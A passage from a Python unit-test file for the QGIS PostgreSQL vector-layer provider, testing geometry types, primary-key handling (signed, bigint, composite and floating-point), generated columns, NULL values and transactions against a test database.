'MultiPolygonZ (((0 0 0, 0 1 0, 1 1 0, 1 0 0, 0 0 0)),((0 0 1, 1 0 1, 1 1 1, 0 1 1, 0 0 1)),((0 0 0, 0 0 1, 0 1 1, 0 1 0, 0 0 0)),((0 1 0, 0 1 1, 1 1 1, 1 1 0, 0 1 0)),((1 1 0, 1 1 1, 1 0 1, 1 0 0, 1 1 0)),((1 0 0, 1 0 1, 0 0 1, 0 0 0, 1 0 0)))')
test_table(self.dbconn, 'pt2d', 'Point (0 0)')
test_table(self.dbconn, 'pt3d', 'PointZ (0 0 0)')
test_table(self.dbconn, 'ls2d', 'LineString (0 0, 1 1)')
test_table(self.dbconn, 'ls3d', 'LineStringZ (0 0 0, 1 1 1)')
test_table(self.dbconn, 'mpt2d', 'MultiPoint ((0 0),(1 1))')
test_table(self.dbconn, 'mpt3d', 'MultiPointZ ((0 0 0),(1 1 1))')
test_table(self.dbconn, 'mls2d',
'MultiLineString ((0 0, 1 1),(2 2, 3 3))')
test_table(self.dbconn, 'mls3d',
'MultiLineStringZ ((0 0 0, 1 1 1),(2 2 2, 3 3 3))')
test_table(self.dbconn, 'pt4d', 'PointZM (1 2 3 4)')
def testMetadata(self):
""" Test that metadata is correctly acquired from provider """
metadata = self.vl.metadata()
self.assertEqual(
metadata.crs(), QgsCoordinateReferenceSystem.fromEpsgId(4326))
self.assertEqual(metadata.type(), 'dataset')
self.assertEqual(metadata.abstract(), 'QGIS Test Table')
def testGetFeaturesUniqueId(self):
"""
Test tables with inheritance for unique ids
"""
def test_unique(features, num_features):
featureids = []
for f in features:
self.assertFalse(f.id() in featureids)
featureids.append(f.id())
self.assertEqual(len(features), num_features)
vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'someData'), "testgeom",
"postgres")
self.assertTrue(vl.isValid())
# Test someData
test_unique([f for f in vl.getFeatures()], 5)
# Test base_table_bad: layer is invalid
vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'base_table_bad'),
"testgeom", "postgres")
self.assertFalse(vl.isValid())
# Test base_table_bad with use estimated metadata: layer is valid because the unique test is skipped
vl = QgsVectorLayer(
'%s srid=4326 estimatedmetadata="true" table="qgis_test".%s (geom) sql=' % (
self.dbconn, 'base_table_bad'),
"testgeom", "postgres")
self.assertTrue(vl.isValid())
# Test base_table_good: layer is valid
vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (self.dbconn, 'base_table_good'),
"testgeom", "postgres")
self.assertTrue(vl.isValid())
test_unique([f for f in vl.getFeatures()], 4)
# Test base_table_good with use estimated metadata: layer is valid
vl = QgsVectorLayer(
'%s srid=4326 estimatedmetadata="true" table="qgis_test".%s (geom) sql=' % (
self.dbconn, 'base_table_good'),
"testgeom", "postgres")
self.assertTrue(vl.isValid())
test_unique([f for f in vl.getFeatures()], 4)
# See https://github.com/qgis/QGIS/issues/22258
# TODO: accept multi-featured layers, and an array of values/fids
def testSignedIdentifiers(self):
def test_layer(ql, att, val, fidval):
self.assertTrue(ql.isValid())
features = ql.getFeatures()
att_idx = ql.fields().lookupField(att)
count = 0
for f in features:
count += 1
self.assertEqual(f.attributes()[att_idx], val)
self.assertEqual(f.id(), fidval)
self.assertEqual(count, 1)
def test(dbconn, query, att, val, fidval):
table = query.replace('"', '\\"')
uri = '%s table="%s" (g) key=\'%s\'' % (dbconn, table, att)
ql = QgsVectorLayer(uri, "t", "postgres")
test_layer(ql, att, val, fidval)
# now with estimated metadata
uri += ' estimatedmetadata="true"'
test_layer(ql, att, val, fidval)
# --- INT16 ----
# zero
test(self.dbconn, '(SELECT 0::int2 i, NULL::geometry(Point) g)', 'i', 0, 0)
# low positive
test(self.dbconn, '(SELECT 1::int2 i, NULL::geometry(Point) g)', 'i', 1, 1)
# low negative
test(self.dbconn, '(SELECT -1::int2 i, NULL::geometry(Point) g)',
'i', -1, 4294967295)
# max positive signed 16bit integer
test(self.dbconn, '(SELECT 32767::int2 i, NULL::geometry(Point) g)',
'i', 32767, 32767)
# max negative signed 16bit integer
test(self.dbconn, '(SELECT (-32768)::int2 i, NULL::geometry(Point) g)',
'i', -32768, 4294934528)
# --- INT32 ----
# zero
test(self.dbconn, '(SELECT 0::int4 i, NULL::geometry(Point) g)', 'i', 0, 0)
# low positive
test(self.dbconn, '(SELECT 2::int4 i, NULL::geometry(Point) g)', 'i', 2, 2)
# low negative
test(self.dbconn, '(SELECT -2::int4 i, NULL::geometry(Point) g)',
'i', -2, 4294967294)
# max positive signed 32bit integer
test(self.dbconn, '(SELECT 2147483647::int4 i, NULL::geometry(Point) g)',
'i', 2147483647, 2147483647)
# max negative signed 32bit integer
test(self.dbconn, '(SELECT (-2147483648)::int4 i, NULL::geometry(Point) g)',
'i', -2147483648, 2147483648)
# --- INT64 (FIDs are always 1 because assigned ex-novo) ----
# zero
test(self.dbconn, '(SELECT 0::int8 i, NULL::geometry(Point) g)', 'i', 0, 1)
# low positive
test(self.dbconn, '(SELECT 3::int8 i, NULL::geometry(Point) g)', 'i', 3, 1)
# low negative
test(self.dbconn, '(SELECT -3::int8 i, NULL::geometry(Point) g)', 'i', -3, 1)
# max positive signed 64bit integer
test(self.dbconn, '(SELECT 9223372036854775807::int8 i, NULL::geometry(Point) g)',
'i', 9223372036854775807, 1)
# max negative signed 32bit integer
test(self.dbconn, '(SELECT (-9223372036854775808)::int8 i, NULL::geometry(Point) g)', 'i', -9223372036854775808,
1)
def testPktIntInsert(self):
vl = QgsVectorLayer('{} table="qgis_test"."{}" key="pk" sql='.format(self.dbconn, 'bikes_view'), "bikes_view",
"postgres")
self.assertTrue(vl.isValid())
f = QgsFeature(vl.fields())
f['pk'] = NULL
f['name'] = 'Cilo'
r, f = vl.dataProvider().addFeatures([f])
self.assertTrue(r)
self.assertNotEqual(f[0]['pk'], NULL, f[0].attributes())
vl.deleteFeatures([f[0].id()])
def testGeneratedFields(self):
"""Test if GENERATED geometry/geography columns are correctly handled by the provider."""
cur = self.con.cursor()
cur.execute("SHOW server_version_num")
pgversion = int(cur.fetchone()[0])
# GENERATED columns are unsupported by PostgreSQL versions earlier than 12.
if pgversion < 120000:
return
# Geometry columns
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
# writing geometry...
f = QgsFeature(vl.fields())
ix_name = f.fieldNameIndex('name')
f.setGeometry(QgsGeometry.fromWkt('Polygon ((-67 -2, -67 0, -68 0, -70 -1, -67 -2))'))
f.setAttribute(ix_name, 'QGIS-3')
self.assertTrue(vl.startEditing())
self.assertTrue(vl.addFeatures([f]))
self.assertTrue(vl.commitChanges())
# reading back to see if we saved the centroid correctly.
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
generated_geometry = f2.geometry().asWkt()
expected_geometry = 'Point (-68.047619047619051 -0.90476190476190477)'
expected_area = 43069568296.34387
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
self.assertEqual(f2['name'], 'QGIS-3')
# Checking if we can correctly change values of an existing feature.
self.assertTrue(vl2.startEditing())
ix2_name = f2.fieldNameIndex('name')
fid2 = f2.id()
vl2.changeAttributeValue(fid2, ix2_name, 'New')
self.assertTrue(vl2.commitChanges())
# getting a brand new QgsVectorLayer
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
# checking if the name field was correctly updated
f = next(vl.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['name'], 'New')
# Now, check if we can change the value of a GENERATED field (we shouldn't)
self.assertTrue(vl.startEditing())
ix_area = f.fieldNameIndex('poly_area')
fid = f.id()
vl.changeAttributeValue(fid, ix_area, 42)
self.assertTrue(vl.commitChanges())
# reading back
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
# now, getting a brand new QgsVectorLayer to check if changes (UPDATE) in the geometry are reflected in the generated fields
vl = QgsVectorLayer('{} table="qgis_test"."{}" (geom) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
self.assertTrue(vl.isValid())
f = next(vl.getFeatures(QgsFeatureRequest()))
vl.startEditing()
fid = f.id()
vl.changeGeometry(fid, QgsGeometry.fromWkt('Polygon ((-67 -2, -65 0, -68 0, -70 -1, -67 -2))'))
vl.commitChanges()
# reading back...
vl2 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_col"), "test_gen_col", "postgres")
f2 = next(vl2.getFeatures(QgsFeatureRequest()))
generated_geometry = f2.geometry().asWkt()
generated_geometry = f2.geometry().asWkt()
expected_geometry = 'Point (-67.42424242424242209 -0.81818181818181823)'
expected_area = 67718478405.28429
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertAlmostEqual(f2['poly_area'], expected_area, places=4)
self.assertEqual(f2['name'], 'New')
# Geography columns
vl3 = QgsVectorLayer('{} table="qgis_test"."{}" (geog) srid=4326 type=POLYGON key="id" sql='.format(self.dbconn, "test_gen_geog_col"), "test_gen_geog_col", "postgres")
self.assertTrue(vl3.isValid())
# writing geography...
f3 = QgsFeature(vl3.fields())
f3.setGeometry(QgsGeometry.fromWkt('Polygon ((-67 -2, -67 0, -68 0, -70 -1, -67 -2))'))
self.assertTrue(vl3.startEditing())
self.assertTrue(vl3.addFeatures([f3]))
self.assertTrue(vl3.commitChanges())
# reading back geography and checking values
vl4 = QgsVectorLayer('{} table="qgis_test"."{}" (cent) srid=4326 type=POINT key="id" sql='.format(self.dbconn, "test_gen_geog_col"), "test_gen_geog_col", "postgres")
f4 = next(vl4.getFeatures(QgsFeatureRequest()))
generated_geometry = f4.geometry().asWkt()
expected_geometry = 'Point (-68.0477406158202 -0.904960604589168)'
expected_area = 43088884296.69713
assert compareWkt(generated_geometry, expected_geometry), "Geometry mismatch! Expected:\n{}\nGot:\n{}\n".format(expected_geometry, generated_geometry)
self.assertEqual(f4['poly_area'], expected_area)
def testNonPkBigintField(self):
"""Test if we can correctly insert, read and change attributes(fields) of type bigint and which are not PKs."""
vl = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk", "postgres")
self.assertTrue(vl.isValid())
flds = vl.fields()
# check if default values are correctly read back
f = next(vl.getFeatures(QgsFeatureRequest()))
bigint_with_default_idx = vl.fields().lookupField('bigint_attribute_def')
self.assertEqual(f.attributes()[bigint_with_default_idx], 42)
# check if NULL values are correctly read
bigint_def_null_idx = vl.fields().lookupField('bigint_attribute')
self.assertEqual(f.attributes()[bigint_def_null_idx], NULL)
# check if we can overwrite a default value
vl.startEditing()
vl.changeAttributeValue(f.id(), bigint_with_default_idx, 43)
pkidx = vl.fields().lookupField('pk')
editedid = f.attributes()[pkidx]
self.assertTrue(vl.commitChanges())
vl2 = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk", "postgres")
flds = vl2.fields()
self.assertTrue(vl2.isValid())
f = next(vl2.getFeatures(
QgsFeatureRequest().setFilterExpression('pk = ' + str(editedid))))
bigint_with_default_idx = vl2.fields().lookupField('bigint_attribute_def')
self.assertEqual(f.attributes()[bigint_with_default_idx], 43)
# check if we can insert a new value
dp = vl2.dataProvider()
dp.setProviderProperty(QgsDataProvider.EvaluateDefaultValues, 1)
pkidx = vl2.fields().lookupField('pk')
vl2.startEditing()
f = QgsFeature(vl2.fields())
f['pk'] = NULL
f['value'] = 'The answer.'
f['bigint_attribute'] = 84
f.setAttribute(pkidx, vl2.dataProvider().defaultValue(pkidx))
f.setAttribute(bigint_with_default_idx,
vl2.dataProvider().defaultValue(bigint_with_default_idx))
r, f = vl2.dataProvider().addFeatures([f])
self.assertTrue(r)
vl2.commitChanges()
inserted_id = f[0]['pk']
f = next(vl2.getFeatures(
QgsFeatureRequest().setFilterExpression('pk = ' + str(inserted_id))))
self.assertEqual(f['bigint_attribute'], 84)
self.assertEqual(f['bigint_attribute_def'], 42)
def testPktUpdateBigintPk(self):
"""Test if we can update objects with positive, zero and negative bigint PKs."""
vl = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk", "postgres")
flds = vl.fields()
self.assertTrue(vl.isValid())
vl.startEditing()
statuses = [-1, -1, -1, -1]
# changing values...
for ft in vl.getFeatures():
if ft['value'] == 'first value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '1st value')
statuses[0] = 0
elif ft['value'] == 'second value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '2nd value')
statuses[1] = 0
elif ft['value'] == 'zero value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '0th value')
statuses[2] = 0
elif ft['value'] == 'negative value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '-1th value')
statuses[3] = 0
self.assertTrue(vl.commitChanges())
self.assertTrue(all(x == 0 for x in statuses))
# now, let's see if the values were changed
vl2 = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk", "postgres")
self.assertTrue(vl2.isValid())
for ft in vl2.getFeatures():
if ft['value'] == '1st value':
statuses[0] = 1
elif ft['value'] == '2nd value':
statuses[1] = 1
elif ft['value'] == '0th value':
statuses[2] = 1
elif ft['value'] == '-1th value':
statuses[3] = 1
self.assertTrue(all(x == 1 for x in statuses))
def testPktUpdateBigintPkNonFirst(self):
"""Test if we can update objects with positive, zero and negative bigint PKs in tables whose PK is not the first field"""
vl = QgsVectorLayer('{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(self.dbconn,
'bigint_non_first_pk'),
"bigint_non_first_pk", "postgres")
flds = vl.fields()
self.assertTrue(vl.isValid())
vl.startEditing()
statuses = [-1, -1, -1, -1]
# changing values...
for ft in vl.getFeatures():
if ft['value'] == 'first value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '1st value')
statuses[0] = 0
elif ft['value'] == 'second value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '2nd value')
statuses[1] = 0
elif ft['value'] == 'zero value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '0th value')
statuses[2] = 0
elif ft['value'] == 'negative value':
vl.changeAttributeValue(
ft.id(), flds.indexOf('value'), '-1th value')
statuses[3] = 0
self.assertTrue(vl.commitChanges())
self.assertTrue(all(x == 0 for x in statuses))
# now, let's see if the values were changed
vl2 = QgsVectorLayer(
'{} sslmode=disable srid=4326 key="pk" table="qgis_test".{} (geom)'.format(
self.dbconn, 'bigint_pk'),
"bigint_pk_nonfirst", "postgres")
self.assertTrue(vl2.isValid())
for ft in vl2.getFeatures():
if ft['value'] == '1st value':
statuses[0] = 1
elif ft['value'] == '2nd value':
statuses[1] = 1
elif ft['value'] == '0th value':
statuses[2] = 1
elif ft['value'] == '-1th value':
statuses[3] = 1
self.assertTrue(all(x == 1 for x in statuses))
def testPktComposite(self):
"""
Check that tables with PKs composed of many fields of different types are correctly read and written to
"""
vl = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2"\' table="qgis_test"."tb_test_compound_pk" (geom)'.format(self.dbconn), "test_compound", "postgres")
self.assertTrue(vl.isValid())
fields = vl.fields()
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 1 AND pk2 = 2')))
# first of all: we must be able to fetch a valid feature
self.assertTrue(f.isValid())
self.assertEqual(f['pk1'], 1)
self.assertEqual(f['pk2'], 2)
self.assertEqual(f['value'], 'test 2')
# can we edit a field?
vl.startEditing()
vl.changeAttributeValue(f.id(), fields.indexOf('value'), 'Edited Test 2')
self.assertTrue(vl.commitChanges())
# Did we get it right? Let's create a new QgsVectorLayer and try to read back our changes:
vl2 = QgsVectorLayer('{} sslmode=disable srid=4326 table="qgis_test"."tb_test_compound_pk" (geom) key=\'"pk1","pk2"\' '.format(self.dbconn), "test_compound2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 1 AND pk2 = 2')))
self.assertTrue(f2.isValid())
# Then, making sure we really did change our value.
self.assertEqual(f2['value'], 'Edited Test 2')
# How about inserting a new field?
f3 = QgsFeature(vl2.fields())
f3['pk1'] = 4
f3['pk2'] = -9223372036854775800
f3['value'] = 'other test'
vl.startEditing()
res, f3 = vl.dataProvider().addFeatures([f3])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# can we catch it on another layer?
f4 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk2 = -9223372036854775800')))
self.assertTrue(f4.isValid())
expected_attrs = [4, -9223372036854775800, 'other test']
self.assertEqual(f4.attributes(), expected_attrs)
# Finally, let's delete one of the features.
f5 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 2 AND pk2 = 1')))
vl2.startEditing()
vl2.deleteFeatures([f5.id()])
self.assertTrue(vl2.commitChanges())
# did we really delete? Let's try to get the deleted feature from the first layer.
f_iterator = vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk1 = 2 AND pk2 = 1'))
got_feature = True
try:
f6 = next(f_iterator)
got_feature = f6.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
def testPktCompositeFloat(self):
"""
Check that tables with PKs composed of many fields of different types are correctly read and written to
"""
vl = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2","pk3"\' table="qgis_test"."tb_test_composite_float_pk" (geom)'.format(self.dbconn), "test_composite_float", "postgres")
self.assertTrue(vl.isValid())
fields = vl.fields()
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '3.14159274'")))
# first of all: we must be able to fetch a valid feature
self.assertTrue(f.isValid())
self.assertEqual(f['pk1'], 1)
self.assertEqual(f['pk2'], 2)
self.assertAlmostEqual(f['pk3'], 3.14159274)
self.assertEqual(f['value'], 'test 2')
# can we edit a field?
vl.startEditing()
vl.changeAttributeValue(f.id(), fields.indexOf('value'), 'Edited Test 2')
self.assertTrue(vl.commitChanges())
# Did we get it right? Let's create a new QgsVectorLayer and try to read back our changes:
vl2 = QgsVectorLayer('{} sslmode=disable srid=4326 key=\'"pk1","pk2","pk3"\' table="qgis_test"."tb_test_composite_float_pk" (geom)'.format(self.dbconn), "test_composite_float2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '3.14159274'")))
self.assertTrue(f2.isValid())
# just making sure we have the correct feature
self.assertAlmostEqual(f2['pk3'], 3.14159274)
# Then, making sure we really did change our value.
self.assertEqual(f2['value'], 'Edited Test 2')
# How about inserting a new field?
f3 = QgsFeature(vl2.fields())
f3['pk1'] = 4
f3['pk2'] = -9223372036854775800
f3['pk3'] = 7.29154
f3['value'] = 'other test'
vl.startEditing()
res, f3 = vl.dataProvider().addFeatures([f3])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# can we catch it on another layer?
f4 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk2 = '-9223372036854775800'")))
self.assertTrue(f4.isValid())
expected_attrs = [4, -9223372036854775800, 7.29154, 'other test']
gotten_attrs = [f4['pk1'], f4['pk2'], f4['pk3'], f4['value']]
self.assertEqual(gotten_attrs[0], expected_attrs[0])
self.assertEqual(gotten_attrs[1], expected_attrs[1])
self.assertAlmostEqual(gotten_attrs[2], expected_attrs[2], places=4)
self.assertEqual(gotten_attrs[3], expected_attrs[3])
# Finally, let's delete one of the features.
f5 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '7.29154'")))
vl2.startEditing()
vl2.deleteFeatures([f5.id()])
self.assertTrue(vl2.commitChanges())
# did we really delete?
f_iterator = vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk3 = '7.29154'"))
got_feature = True
try:
f6 = next(f_iterator)
got_feature = f6.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
def testPktFloatingPoint(self):
"""
Check if we can handle floating point/numeric primary keys correctly
"""
# 1. 32 bit float (PostgreSQL "REAL" type)
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_float_pk" (geom)', "test_float_pk", "postgres")
self.assertTrue(vl.isValid())
# 1.1. Retrieving
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f.isValid())
self.assertEqual(f['value'], 'first teste')
# 1.2. Editing
self.assertTrue(vl.startEditing())
vl.changeAttributeValue(f.id(), vl.fields().indexOf('value'), 'Changed first')
self.assertTrue(vl.commitChanges())
# 1.2.1. Checking edit from another vector layer
vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk1" table="qgis_test"."tb_test_float_pk" (geom)', "test_float_pk2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f2.isValid())
self.assertEqual(f2['value'], 'Changed first')
# 1.3. Deleting
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'")))
vl.startEditing()
vl.deleteFeatures([f.id()])
self.assertTrue(vl.commitChanges())
# 1.3.1. Checking deletion
f_iterator = vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'"))
got_feature = True
try:
f2 = next(f_iterator)
got_feature = f2.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
# 1.4. Inserting new feature
newpointwkt = 'Point(-47.751 -15.644)'
f = QgsFeature(vl.fields())
f['pk'] = 0.22222222222222222222222
f['value'] = 'newly inserted'
f.setGeometry(QgsGeometry.fromWkt(newpointwkt))
vl.startEditing()
res, f = vl.dataProvider().addFeatures([f])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# 1.4.1. Checking insertion
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '0.22222222222222222222222'")))
self.assertTrue(f2.isValid())
self.assertAlmostEqual(f2['pk'], 0.2222222222222222)
self.assertEqual(f2['value'], 'newly inserted')
assert compareWkt(f2.geometry().asWkt(), newpointwkt), "Geometry mismatch. Expected: {} Got: {} \n".format(f2.geometry().asWkt(), newpointwkt)
# One more check: can we retrieve the same row with the value that we got from this layer?
floatpk = f2['pk']
f3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '{}'".format(floatpk))))
self.assertTrue(f3.isValid())
self.assertEqual(f3['value'], 'newly inserted')
self.assertEqual(f3['pk'], floatpk)
# 2. 64 bit float (PostgreSQL "DOUBLE PRECISION" type)
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_double_pk" (geom)', "test_double_pk", "postgres")
self.assertTrue(vl.isValid())
# 2.1. Retrieving
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f.isValid())
self.assertEqual(f['value'], 'first teste')
# 2.2. Editing
self.assertTrue(vl.startEditing())
vl.changeAttributeValue(f.id(), vl.fields().indexOf('value'), 'Changed first')
self.assertTrue(vl.commitChanges())
# 2.2.1. Checking edit from another vector layer
vl2 = QgsVectorLayer(self.dbconn + ' sslmode=disable srid=4326 key="pk" table="qgis_test"."tb_test_double_pk" (geom)', "test_double_pk2", "postgres")
self.assertTrue(vl2.isValid())
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '3.141592653589793238462643383279502884197169'")))
self.assertTrue(f2.isValid())
self.assertEqual(f2['value'], 'Changed first')
# 2.3. Deleting
f = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'")))
vl.startEditing()
vl.deleteFeatures([f.id()])
self.assertTrue(vl.commitChanges())
# 2.3.1. Checking deletion
f_iterator = vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '2.718281828459045235360287471352662497757247'"))
got_feature = True
try:
f2 = next(f_iterator)
got_feature = f2.isValid()
except StopIteration:
got_feature = False
self.assertFalse(got_feature)
# 2.4. Inserting new feature
newpointwkt = 'Point(-47.751 -15.644)'
f = QgsFeature(vl.fields())
f['pk'] = 0.22222222222222222222222
f['value'] = 'newly inserted'
f.setGeometry(QgsGeometry.fromWkt(newpointwkt))
vl.startEditing()
res, f = vl.dataProvider().addFeatures([f])
self.assertTrue(res)
self.assertTrue(vl.commitChanges())
# 2.4.1. Checking insertion
f2 = next(vl2.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '0.22222222222222222222222'")))
self.assertTrue(f2.isValid())
self.assertAlmostEqual(f2['pk'], 0.2222222222222222, places=15)
self.assertEqual(f2['value'], 'newly inserted')
assert compareWkt(f2.geometry().asWkt(), newpointwkt), "Geometry mismatch. Expected: {} Got: {} \n".format(f2.geometry().asWkt(), newpointwkt)
# One more check: can we retrieve the same row with the value that we got from this layer?
doublepk = f2['pk']
f3 = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression("pk = '{}'".format(doublepk))))
self.assertTrue(f3.isValid())
self.assertEqual(f3['value'], 'newly inserted')
self.assertEqual(f3['pk'], doublepk)
# no NUMERIC/DECIMAL checks here. NUMERIC primary keys are unsupported.
# TODO: implement NUMERIC primary keys/arbitrary precision arithmethics/fixed point math in QGIS.
def testPktMapInsert(self):
vl = QgsVectorLayer('{} table="qgis_test"."{}" key="obj_id" sql='.format(self.dbconn, 'oid_serial_table'),
"oid_serial", "postgres")
self.assertTrue(vl.isValid())
f = QgsFeature(vl.fields())
f['obj_id'] = vl.dataProvider().defaultValueClause(0)
f['name'] = 'Test'
r, f = vl.dataProvider().addFeatures([f])
self.assertTrue(r)
self.assertNotEqual(f[0]['obj_id'], NULL, f[0].attributes())
vl.deleteFeatures([f[0].id()])
def testNull(self):
"""
Asserts that 0, '' and NULL are treated as different values on insert
"""
vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' table="qgis_test"."constraints" sql=', 'test1',
'postgres')
self.assertTrue(vl.isValid())
QgsProject.instance().addMapLayer(vl)
tg = QgsTransactionGroup()
tg.addLayer(vl)
vl.startEditing()
def onError(message):
"""We should not get here. If we do, fail and say why"""
self.assertFalse(True, message)
vl.raiseError.connect(onError)
f = QgsFeature(vl.fields())
f['gid'] = 100
f['val'] = 0
f['name'] = ''
self.assertTrue(vl.addFeature(f))
feature = next(vl.getFeatures('"gid" = 100'))
self.assertEqual(f['val'], feature['val'])
self.assertEqual(f['name'], feature['name'])
def testNestedInsert(self):
tg = QgsTransactionGroup()
tg.addLayer(self.vl)
self.vl.startEditing()
it = self.vl.getFeatures()
f = next(it)
f['pk'] = NULL
self.vl.addFeature(f) # Should not deadlock during an active iteration
f = next(it)
def testTimeout(self):
"""
Asserts that we will not deadlock if more iterators are opened in parallel than
available in the connection pool
"""
request = QgsFeatureRequest()
request.setTimeout(1)
iterators = list()
for i in range(100):
iterators.append(self.vl.getFeatures(request))
def testTransactionDirtyName(self):
# create a vector ayer based on postgres
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
# prepare a project with transactions enabled
p = QgsProject()
p.setAutoTransaction(True)
p.addMapLayers([vl])
vl.startEditing()
# update the data within the transaction
tr = vl.dataProvider().transaction()
sql = "update qgis_test.some_poly_data set pk=1 where pk=1"
name = "My Awesome Transaction!"
self.assertTrue(tr.executeSql(sql, True, name)[0])
# test name
self.assertEqual(vl.undoStack().command(0).text(), name)
# rollback
vl.rollBack()
def testTransactionDirty(self):
# create a vector layer based on postgres
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
# prepare a project with transactions enabled
p = QgsProject()
p.setAutoTransaction(True)
p.addMapLayers([vl])
vl.startEditing()
# check that the feature used for testing is ok
ft0 = vl.getFeatures('pk=1')
f = QgsFeature()
self.assertTrue(ft0.nextFeature(f))
# update the data within the transaction
tr = vl.dataProvider().transaction()
sql = "update qgis_test.some_poly_data set pk=33 where pk=1"
self.assertTrue(tr.executeSql(sql, True)[0])
# check that the pk of the feature has been changed
ft = vl.getFeatures('pk=1')
self.assertFalse(ft.nextFeature(f))
ft = vl.getFeatures('pk=33')
self.assertTrue(ft.nextFeature(f))
# underlying data has been modified but the layer is not tagged as
# modified
self.assertTrue(vl.isModified())
# undo sql query
vl.undoStack().undo()
# check that the original feature with pk is back
ft0 = vl.getFeatures('pk=1')
